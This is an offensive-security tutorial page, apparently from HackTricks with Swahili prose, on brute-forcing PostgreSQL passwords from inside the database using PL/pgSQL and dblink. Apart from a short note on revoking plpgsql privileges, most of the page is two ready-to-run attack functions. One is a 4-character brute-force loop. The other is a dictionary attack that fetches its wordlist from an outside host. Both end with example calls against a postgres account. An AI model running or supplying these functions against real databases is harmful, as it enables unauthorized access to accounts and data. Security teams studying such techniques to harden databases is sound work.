PL/pgSQL Password Bruteforce

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Find more information about these attack in the original paper.

PL/pgSQL ni lugha ya programu iliyo na vipengele vyote ambayo inapanua uwezo wa SQL kwa kutoa udhibiti wa taratibu ulioimarishwa. Hii inajumuisha matumizi ya mizunguko na muundo mbalimbali wa udhibiti. Kazi zilizoundwa katika lugha ya PL/pgSQL zinaweza kuitwa na taarifa za SQL na triggers, kupanua wigo wa operesheni ndani ya mazingira ya hifadhidata.

Unaweza kutumia lugha hii ili kuomba PostgreSQL kujaribu nguvu akidi za watumiaji, lakini lazima iwepo kwenye hifadhidata. Unaweza kuthibitisha uwepo wake kwa kutumia:

SELECT lanname,lanacl FROM pg_language WHERE lanname = 'plpgsql';
lanname | lanacl
---------+---------
plpgsql |

Kwa default, kuunda kazi ni haki inayotolewa kwa PUBLIC, ambapo PUBLIC inarejelea kila mtumiaji kwenye mfumo huo wa hifadhidata. Ili kuzuia hili, msimamizi angeweza kuondoa haki ya USAGE kutoka kwa eneo la PUBLIC:

REVOKE ALL PRIVILEGES ON LANGUAGE plpgsql FROM PUBLIC;

Katika kesi hiyo, ombi letu la awali lingetoa matokeo tofauti:

SELECT lanname,lanacl FROM pg_language WHERE lanname = 'plpgsql';
lanname | lanacl
---------+-----------------
plpgsql | {admin=U/admin}

Kumbuka kwamba ili script ifanye kazi kazi dblink inahitaji kuwepo. Ikiwa haipo unaweza kujaribu kuunda hiyo na

CREATE EXTENSION dblink;

Password Brute Force

Hapa kuna jinsi unavyoweza kufanya brute force ya nywila ya herufi 4:

//Create the brute-force function
CREATE OR REPLACE FUNCTION brute_force(host TEXT, port TEXT,
username TEXT, dbname TEXT) RETURNS TEXT AS
$$
DECLARE
word TEXT;
BEGIN
FOR a IN 65..122 LOOP
FOR b IN 65..122 LOOP
FOR c IN 65..122 LOOP
FOR d IN 65..122 LOOP
BEGIN
word := chr(a) || chr(b) || chr(c) || chr(d);
PERFORM(SELECT * FROM dblink(' host=' || host ||
' port=' || port ||
' dbname=' || dbname ||
' user=' || username ||
' password=' || word,
'SELECT 1')
RETURNS (i INT));
RETURN word;
EXCEPTION
WHEN sqlclient_unable_to_establish_sqlconnection
THEN
-- do nothing
END;
END LOOP;
END LOOP;
END LOOP;
END LOOP;
RETURN NULL;
END;
$$ LANGUAGE 'plpgsql';

//Call the function
select brute_force('127.0.0.1', '5432', 'postgres', 'postgres');

Nakili kwamba hata kujaribu nguvu kwa herufi 4 kunaweza kuchukua dakika kadhaa.

Unaweza pia kupakua orodha ya maneno na kujaribu tu nywila hizo (shambulio la kamusi):

//Create the function
CREATE OR REPLACE FUNCTION brute_force(host TEXT, port TEXT,
username TEXT, dbname TEXT) RETURNS TEXT AS
$$
BEGIN
FOR word IN (SELECT word FROM dblink('host=1.2.3.4
user=name
password=qwerty
dbname=wordlists',
'SELECT word FROM wordlist')
RETURNS (word TEXT)) LOOP
BEGIN
PERFORM(SELECT * FROM dblink(' host=' || host ||
' port=' || port ||
' dbname=' || dbname ||
' user=' || username ||
' password=' || word,
'SELECT 1')
RETURNS (i INT));
RETURN word;

EXCEPTION
WHEN sqlclient_unable_to_establish_sqlconnection THEN
-- do nothing
END;
END LOOP;
RETURN NULL;
END;
$$ LANGUAGE 'plpgsql'

-- Call the function
select brute_force('127.0.0.1', '5432', 'postgres', 'postgres');